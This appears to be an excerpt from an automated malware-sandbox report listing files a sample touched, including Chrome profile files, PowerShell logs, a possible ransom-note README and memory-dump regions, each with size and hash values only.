e190da8675f703743417557fcf6b2d63c976855fa17313ddda908faebb2a9aa4e9982181f5957d779f1f276e7e814ab4f4026415aa7f271c5659bc9887a74de9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1
Filesize
264KB

MD5
892c0cb7f1792e0b1b70044c23bfa68a

SHA1
45ab00e54de2e6a924862ffb9e418ddbe45d83ec

SHA256
ca3f9affa2509119e273b229c6c203a5d79f5de182a6c7da1d00c27227911dd8

SHA512
82eca441b1bd7085b19d1e61ab202cbeb15731e858e2d734ecf1e8212c1ddb8b05390b5e95352b2992e8c73b236a6c2d9f49e338382fdd1f6f2f163902054ed2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Filesize
4KB

MD5
373527c1a2317ac36f0a7ea21beb6164

SHA1
3be16eb456f6beae4f2a3f6a0ee790f1f47bf208

SHA256
94d36035297edf7c97503793add5bd69dc583450e1dd1bfb0229cc6123120abd

SHA512
aaecc99881df4e3160b45e667267b3f52ef0dc368195e9ef4c96340c590bc8c20d7720a14af32f7a54427b2ce84dc6f420b1aabc8b4e5453a092bb1861dd5bc0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
1KB

MD5
f09ac09e921684db701defba3e30ec9a

SHA1
c7c3b04660f172eda6dcdc1a9c353da06508c5c1

SHA256
efdcd68e40300eceb12cba9b8a772ba580d0ad8d11269ad46e73bd7ed0c967a6

SHA512
c9f0153e54644cf7e91a31e0cef44faffe9b63287f78dcb13a87be9a16eb220f9659e6392ee2fddc22f5559992e7c0ab99bef49f248b4c628cc0b25281f4aac3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
538B

MD5
b0105371beb17f4ebd2515df51b12fa6

SHA1
a486570d7a8c0cdec1dea396e15a07624740a468

SHA256
ddf0ba879f508821f31ad462e7957ac6c3bb8e99bca4987ca02d8529b940fc97

SHA512
14b49a39baf657a73eaef04c569a4e9bb5e37d002edd35c204790e84060b64fb6f00f0c4a1c59f6416994890ececc68ccac08fb78a5c9e59903b28d5a93a9c76

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
1KB

MD5
b037691202d8aa4ddab8523e5c9fe754

SHA1
3039e9d5a5f756b49404c61747f3233cbec04bdf

SHA256
3418c397bbbe64b1939a5c6447ac078ba15cfc4515c35008b8accec50a7edf9f

SHA512
33615b22c3fd974b7283c546d4edcf6352caee44d5d6ab1557753636518c061183c8916c177f5d48117fd1669403919a6cc80fb0c6b20f4281d43bdd703a40e7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
5KB

MD5
36a71e2dc2d11f69e04670a541625150

SHA1
1a7e7f1ec48b769ce851f1574deecce7bde4a8b8

SHA256
7552ba14e1cfbb3ed69387eaacd25bb0e0c9dc684afe92c6341a0c8a1cee2330

SHA512
09f8773e80c4962798e1f5c55c54171c1d04e6b80343bf7051a1aa995993f03beed02ce3e16adbd93bdadf939ffad7b22a2adfa2c595f6aa1acf489090bbbdbe

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
01835d79d4e056d563944eab9d536237

SHA1
f332bd4c751273f6318289063dd24516d8687624

SHA256
a1cc4b7be2cd84435ffdd57f397f307e998a1ce235757ff96bfdf6cea88f3279

SHA512
4be80b32476889bc10003da92fa5ba36e0f506002a9fd4e59b70d5e26dac43d2591bafee647f724319bf8260c23fbf93923f0612c56bdd5fe47216bf25930e67

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
95c1b3b6de9c6567aa157f80aa47635c

SHA1
7d766cf47fcc7494157d691dd8e2a312902fcdbf

SHA256
137d65348eaa1b9c63287ab86c2b0c58dd05fba9a7d6e77b2ce07440d1c58f1b

SHA512
798329351262a01c8ff1d059fa15022a0a53e14571b4601a75e80cfd6a73dfff9abd9bc5378bfb669f8e0feee7c3fcfe06b309790b289ea6ae9f47338ee67025

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
158KB

MD5
422e960db094efdd0d1dd4390812c753

SHA1
53ee76f482209c050df9e5145a2474ef6ebdbee5

SHA256
8815d11d2afad46d112ca94829c721aff8d2bd71932f796ab99d824f9a4d4a0a

SHA512
5c75521e274b7e30a021198c548b9d2f02969d021a1ff8374584dec66a394f953efc6190e15d684e03389a906f4404f8cce69f50c48d67d1414ab3f0cad4c67d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
158KB

MD5
1f61eeae01f5932fdc4c66026987969b

SHA1
7513dea2f9a4052a56dac46aaf423a1dc478228e

SHA256
cef92aae5d3f27407e8a24e551da645bfa5811a80efa462f175d8b2f51484fcd

SHA512
c4fce5d46035f4d83ec159fbb707ed787060bc27ce43ca079f8d8ca249939f539ac8b00b2d7881dc9de39fc96a796a19d8dbcb646f73a0b6505daeca6aec1f34

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
ea6243fdb2bfcca2211884b0a21a0afc

SHA1
2eee5232ca6acc33c3e7de03900e890f4adf0f2f

SHA256
5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

SHA512
189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
76814e73e987f1e4d03ecc902ae247aa

SHA1
8a7f36164270629ad6fc7cd87cdb888e236352c3

SHA256
12c67fe056d437726ff5ebfc39bbc775bf7ac33f807b263cb3ad6257674fd4d2

SHA512
e40f4252fe0aa56379751beffcb5c6af6a67563c750a80def0e7c43835558dda08fb13bf048d37419557d3c55eaa52ab20e63412366e8ced8d40b4cd81250dae

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n2p5m10t.iho.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\README.db7e0c7a.TXT
Filesize
3KB

MD5
b58e2411168bbdbec635cf4001635db0

SHA1
c130cd9caaaa514a6b98c1168e10d44a989d191a

SHA256
652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a

SHA512
87e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a

Download Submit
\??\pipe\crashpad_1664_WEAQTZHJYQUJCZLC
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/4508-132-0x000002B5A0310000-0x000002B5A0332000-memory.dmp

Filesize
136KB

Download
memory/4508-153-0x000002B5A0140000-0x000002B5A0150000-memory.dmp

Filesize
64KB

Download
memory/4508-152-0x000002B5A0140000-0x000002B5A0150000-memory.dmp

Filesize
64KB

Download
memory/4508-150-0x000002B5A0140000-0x000002B5A0150000-memory.dmp

Filesize
64KB

Download
memory/4508-135-0x000002B5A04C0000-0x000002B5A0536000-memory.dmp

Filesize
472KB

Download